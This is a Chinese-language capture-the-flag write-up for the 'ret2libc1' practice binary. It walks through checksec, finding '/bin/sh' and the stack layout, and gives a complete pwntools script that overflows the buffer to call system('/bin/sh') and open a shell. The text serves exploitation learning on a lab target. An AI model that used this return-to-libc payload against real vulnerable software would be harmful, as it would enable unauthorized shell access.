拿到题目,先checksec一下:
发现打开了NX,栈不可执行,则不能将自己写好的shellcode放到栈中执行,用file命令,发现是动态编译的,则不能用ROPgadget,于是看下程序中是否存在后门函数,
放入ida,发现没有后门函数,只有
这里调用了system函数,则想法是通过栈溢出调用system函数,并且将system函数参数换成"/bin/sh"
这里便存在三个问题:1.”/bin/sh"是否存在 2.栈构造 3. system()函数调用地址
先解决第一个问题,用strings ret2libc1 | grep /bin/sh 发现存在/bin/sh
第二个问题栈构造,经过动态调试,栈构造如下:
第三个问题,system()的地址,我们没办法知道system的地址,但我们可以使用ELF知道system@plt的地址
攻击脚本:
from pwn import *
io = process("./ret2libc1")
elf = ELF("./ret2libc1")
system_plt = elf.plt["system"]
bin_sh = next(elf.search(b'/bin/sh'))
payload = 112 * b'A' + p32(system_plt) + b'AAAA' + p32(bin_sh)
io.sendline(payload)
io.interactive()
Sucessful!!!!